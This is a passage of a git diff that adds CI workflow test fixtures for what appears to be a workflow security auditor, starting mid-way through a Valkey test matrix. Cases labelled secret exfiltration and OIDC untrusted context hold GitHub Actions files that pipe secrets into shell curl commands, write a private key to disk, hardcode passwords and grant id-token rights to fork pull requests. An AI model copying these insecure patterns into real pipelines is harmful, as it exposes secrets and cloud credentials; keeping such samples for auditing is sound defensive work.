install_epel: true + - name: test-almalinux9-tls-module-no-tls + container: almalinux:9 + install_epel: true + - name: test-centosstream9-tls-module-no-tls + container: quay.io/centos/centos:stream9 + install_epel: true + - name: test-fedoralatest-tls-module-no-tls + container: fedora:latest + - name: test-fedorarawhide-tls-module-no-tls + container: fedora:rawhide + name: ${{ matrix.name }} + runs-on: ubuntu-latest + container: ${{ matrix.container }} + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install EPEL + if: matrix.install_epel + run: dnf -y install epel-release + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + dnf -y install make gcc openssl-devel openssl procps-ng which /usr/bin/kill /usr/bin/awk + cd libbacktrace && ./configure && make && make install + - name: make + run: make -j BUILD_TLS=module SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + dnf -y install tcl tcltls + ./utils/gen-test-certs.sh + - name: test + if: true && 
!contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-macos-latest: + runs-on: macos-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') && !(contains(github.event.inputs.skiptests, 'valkey') && contains(github.event.inputs.skiptests, 'modules')) + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: 
actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --clients 1 --no-latency --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --clients 1 --no-latency --dump-logs ${{github.event.inputs.test_args}} + test-macos-latest-sentinel: + runs-on: macos-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') && !contains(github.event.inputs.skiptests, 'sentinel') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo 
"GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + test-macos-latest-cluster: + runs-on: macos-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') && !contains(github.event.inputs.skiptests, 'cluster') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> 
$GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + build-old-macos-versions: + strategy: + fail-fast: false + matrix: + os: [macos-14] + runs-on: ${{ matrix.os }} + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') + timeout-minutes: 1440 + steps: + - uses: maxim-lobanov/setup-xcode@60606e260d2fc5762a71e64e74b2174e8ea3c8bd # v1.6.0 + with: + xcode-version: latest + - name: prep + if: github.event_name == 
'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + test-freebsd: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'freebsd') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || 
github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: test + uses: cross-platform-actions/action@39a2a80642eca0947594ad03e4355dc3d28c617a # v0.32.0 + with: + operating_system: freebsd + environment_variables: MAKE + version: 13.2 + shell: bash + run: | + sudo pkg install -y bash gmake lang/tcl86 lang/tclX + gmake + ./runtest --single unit/keyspace --single unit/auth --single unit/networking --single unit/protocol + test-alpine-jemalloc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'alpine') + container: alpine:latest + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || 
github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + apk add build-base git + cd libbacktrace && ./configure && make && make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: apk add tcl procps tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-alpine-libc-malloc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'alpine') + container: alpine:latest + steps: + - name: prep + if: 
github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + apk add build-base git + cd libbacktrace && ./configure && make && make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_JEMALLOC=no CFLAGS=-DUSE_MALLOC_USABLE_SIZE USE_LIBBACKTRACE=yes + - name: testprep + run: apk add tcl procps tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster 
${{github.event.inputs.cluster_test_args}} + reply-schemas-validator: + runs-on: ubuntu-latest + timeout-minutes: 1440 + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'reply-schema') + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror -DLOG_REQ_RES' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') 
+ run: ./runtest --log-req-res --no-latency --dont-clean --force-resp3 --tags -slow --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --log-req-res --no-latency --dont-clean --force-resp3 --dont-pre-clean --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel --log-req-res --dont-clean --force-resp3 ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster --log-req-res --dont-clean --force-resp3 ${{github.event.inputs.cluster_test_args}} + - name: Install Python dependencies + uses: py-actions/py-dependency-install@30aa0023464ed4b5b116bd9fbdab87acf01a484e # v4.1.0 + with: + path: "./utils/req-res-validator/requirements.txt" + - name: validator + run: ./utils/req-res-log-validator.py --verbose --fail-missing-reply-schemas ${{ (!contains(github.event.inputs.skiptests, 'valkey') && !contains(github.event.inputs.skiptests, 'module') && !contains(github.event.inputs.skiptests, 'sentinel') && !contains(github.event.inputs.skiptests, 'cluster')) && (inputs.test_args || github.event.inputs.test_args || '') == '' && (inputs.cluster_test_args || github.event.inputs.cluster_test_args || '') == '' && '--fail-commands-not-all-hit' || '' }} + notify-about-job-results: + runs-on: ubuntu-latest + if: always() && github.event_name == 'schedule' && github.repository == 'valkey-io/valkey' + needs: + - test-ubuntu-jemalloc + - test-ubuntu-arm + - test-ubuntu-jemalloc-fortify + - test-ubuntu-libc-malloc + - test-ubuntu-no-malloc-usable-size + - test-ubuntu-32bit + - test-ubuntu-tls + - test-ubuntu-tls-no-tls + - test-ubuntu-io-threads + - test-ubuntu-tls-io-threads + - test-ubuntu-reclaim-cache + - test-valgrind-test + - 
test-valgrind-misc + - test-valgrind-no-malloc-usable-size-test + - test-valgrind-no-malloc-usable-size-misc + - test-sanitizer-address + - test-sanitizer-address-large-memory + - test-sanitizer-undefined + - test-sanitizer-undefined-large-memory + - test-sanitizer-force-defrag + - test-ubuntu-lttng + - test-rpm-distros-jemalloc + - test-rpm-distros-tls-module + - test-rpm-distros-tls-module-no-tls + - test-macos-latest + - test-macos-latest-sentinel + - test-macos-latest-cluster + - build-old-macos-versions + - test-freebsd + - test-alpine-jemalloc + - test-alpine-libc-malloc + - reply-schemas-validator + steps: + - name: Collect job status + run: | + FAILED_JOBS=() + NEEDS_JSON='${{ toJSON(needs) }}' + JOBS=($(echo "$NEEDS_JSON" | jq 'keys' | tr -d '[] ,')) + for JOB in ${JOBS[@]}; do + JOB_RESULT=$(echo "$NEEDS_JSON" | jq ".[$JOB][\"result\"]" | tr -d '"') + if [ $JOB_RESULT = "failure" ]; then + FAILED_JOBS+=($JOB) + fi + done + + if [[ ${#FAILED_JOBS[@]} -ne 0 ]]; then + echo "FAILED_JOBS=${FAILED_JOBS[@]}" >> $GITHUB_ENV + echo "STATUS=failure" >> $GITHUB_ENV + else + echo "STATUS=success" >> $GITHUB_ENV + fi + - name: Notify about results + uses: ravsamhq/notify-slack-action@042f29088bb3bdbda5b4ff7b4818466a277fa8f7 # v2.5.0 + with: + status: ${{ env.STATUS }} + notify_when: "failure" + notification_title: "Daily test run <${{github.server_url}}/${{github.repository}}/actions/runs/${{github.run_id}}|Failure>" + message_format: ":fire: Tests failed: ${{ env.FAILED_JOBS }}" + env: + SLACK_WEBHOOK_URL: ${{ secrets.SLACK_NOTIFICATIONS_WEBHOOK_URL }} diff --git a/test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml b/test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml new file mode 100644 index 0000000..6cd1765 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml @@ -0,0 +1,133 @@ +on: + 
push: + branches: + - master + - main + pull_request: + branches: + - master + - main + +name: DBs + Posit Pro Drivers (Linux) + +jobs: + database: + if: ${{ (github.event_name != 'pull_request') || (github.event.pull_request.head.repo.full_name == github.event.pull_request.base.repo.full_name) }} + runs-on: ubuntu-latest + + services: + oracle: + image: gvenzl/oracle-xe:21.3.0 + ports: + - 1521:1521 + env: + ORACLE_RANDOM_PASSWORD: true + ORACLE_DATABASE: test + APP_USER: RodbcR + APP_USER_PASSWORD: Password12 + options: >- + --health-cmd healthcheck.sh + --health-interval 10s + --health-timeout 5s + --health-retries 10 + + postgres: + image: postgres + ports: + - 5432:5432 + env: + POSTGRES_USER: postgres + POSTGRES_PASSWORD: password + POSTGRES_DB: test + options: --health-cmd pg_isready --health-interval 10s --health-timeout 5s --health-retries 5 + sqlserver: + image: mcr.microsoft.com/mssql/server:2017-latest-ubuntu + ports: + - 1433:1433 + env: + ACCEPT_EULA: Y + SA_PASSWORD: Password12 + + env: + ODBC_DRIVERS_VINTAGE: "PRO" + CRAN: "https://packagemanager.rstudio.com/cran/__linux__/jammy/latest" + ODBCSYSINI: ${{ github.workspace }}/.github/odbc + TNS_ADMIN: ${{ github.workspace }}/.github/odbc + GITHUB_PAT: ${{ secrets.GITHUB_TOKEN }} + + steps: + - uses: actions/checkout@v3 + + - uses: r-lib/actions/setup-r@v2 + + - name: Install Driver Manager + run: sudo apt-get install -y unixodbc-dev + + - name: Install MySQL Driver + run: | + sudo systemctl start mysql.service + mysql -uroot -h127.0.0.1 -proot -e 'CREATE DATABASE `test`;' + echo "ODBC_CS_MYSQL=dsn=ProMySQL" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/mysql + touch $ODBCSYSINI/pro_drivers/mysql.tar.gz + curl ${{ secrets.PRO_DRIVER_MYSQL }} --output $ODBCSYSINI/pro_drivers/mysql.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/mysql.tar.gz -C $ODBCSYSINI/pro_drivers/mysql + + - name: Install SQL Server Driver + run: | + echo "ODBC_CS_SQLSERVER=dsn=ProMicrosoftSQLServer;UID=SA;PWD=Password12" >> 
$GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/sql_server + touch $ODBCSYSINI/pro_drivers/sql_server.tar.gz + curl ${{ secrets.PRO_DRIVER_SQL_SERVER }} --output $ODBCSYSINI/pro_drivers/sql_server.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/sql_server.tar.gz -C $ODBCSYSINI/pro_drivers/sql_server + + - name: Install Oracle Driver + run: | + echo "ODBC_CS_ORACLE=dsn=ProOracle;UID=RodbcR;PWD=Password12;DBQ=test" >> $GITHUB_ENV + .github/odbc/install-oracle-driver.sh + echo "LD_LIBRARY_PATH=/opt/oracle/instantclient_21_12:$LD_LIBRARY_PATH" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/oracle + touch $ODBCSYSINI/pro_drivers/oracle.tar.gz + curl ${{ secrets.PRO_DRIVER_ORACLE }} --output $ODBCSYSINI/pro_drivers/oracle.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/oracle.tar.gz -C $ODBCSYSINI/pro_drivers/oracle + + - name: Install PostgreSQL Driver + run: | + echo "ODBC_CS_POSTGRES=dsn=ProPostgreSQL" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/postgresql + touch $ODBCSYSINI/pro_drivers/postgresql.tar.gz + curl ${{ secrets.PRO_DRIVER_POSTGRESQL }} --output $ODBCSYSINI/pro_drivers/postgresql.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/postgresql.tar.gz -C $ODBCSYSINI/pro_drivers/postgresql + + - name: Install Snowflake Driver + run: | + echo "ODBC_CS_SNOWFLAKE=dsn=Snowflake" >> $GITHUB_ENV + mkdir -p $ODBCSYSINI/pro_drivers/snowflake + touch $ODBCSYSINI/pro_drivers/snowflake.tar.gz + curl ${{ secrets.PRO_DRIVER_SNOWFLAKE }} --output $ODBCSYSINI/pro_drivers/snowflake.tar.gz + tar -xvzf $ODBCSYSINI/pro_drivers/snowflake.tar.gz -C $ODBCSYSINI/pro_drivers/snowflake + echo "Driver=$ODBCSYSINI/pro_drivers/snowflake/bin/lib/libsnowflakeodbc_sb64.so" | tee -a $ODBCSYSINI/odbc.ini + + # note that this assumes Snowflake is the last odbc.ini entry + - name: Prepare Snowflake private key + run: | + echo "${{ secrets.SNOWFLAKE_PRIVATE_KEY }}" > $ODBCSYSINI/private_key.pem + echo "PRIV_KEY_FILE=$ODBCSYSINI/private_key.pem" | tee -a $ODBCSYSINI/odbc.ini + export 
SNOWFLAKE_PRIVATE_KEY_EXISTS=TRUE + + - name: Install dependencies + uses: r-lib/actions/setup-r-dependencies@v2 + with: + needs: check + + - name: Install locally to avoid error with test_local() + run: | + R CMD INSTALL . + env: + LIB_DIR: /usr/lib/x86_64-linux-gnu/ + INCLUDE_DIR: /usr/include + + - name: Test + run: | + options("odbc.interruptible"=TRUE);testthat::test_local(reporter = testthat::ProgressReporter$new(max_failures = Inf, update_interval = Inf)) + shell: Rscript {0} diff --git a/test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml b/test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml new file mode 100644 index 0000000..d307705 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml @@ -0,0 +1,329 @@ +name: Lint Frontend +on: + pull_request: + push: + branches: + - main + - release-*.*.* + +permissions: {} + +jobs: + detect-changes: + name: Detect whether code changed + runs-on: ubuntu-latest + permissions: + contents: read + outputs: + changed: ${{ steps.detect-changes.outputs.frontend }} + prettier: ${{ steps.detect-changes.outputs.frontend == 'true' || steps.detect-changes.outputs.docs == 'true' }} + changed-frontend-packages: ${{ steps.detect-changes.outputs.frontend-packages }} + changed-frontend-dependencies: ${{ steps.detect-changes.outputs.frontend-dependencies }} + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: true # required to get more history in the changed-files action + fetch-depth: 2 + - name: Detect changes + id: detect-changes + uses: ./.github/actions/change-detection + with: + self: .github/workflows/frontend-lint.yml + + lint-frontend-prettier: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow only for PRs from forks; if it gets merged into `main` or `release-*`, 
+ # the `lint-frontend-prettier-enterprise` workflow will run instead + if: github.event_name == 'pull_request' && github.event.pull_request.head.repo.fork == true && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + persist-credentials: false + - name: Setup Node.js + uses: ./.github/actions/setup-node + - name: Install yarn dependencies + uses: ./.github/actions/yarn-install + - run: yarn run prettier:check + - run: yarn run lint + lint-frontend-prettier-enterprise: + needs: detect-changes + permissions: + contents: read + id-token: write + # Run this workflow for non-PR events (like pushes to `main` or `release-*`) OR for internal PRs (PRs not from forks) + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.fork == false && needs.detect-changes.outputs.prettier == 'true' + name: Lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + with: + 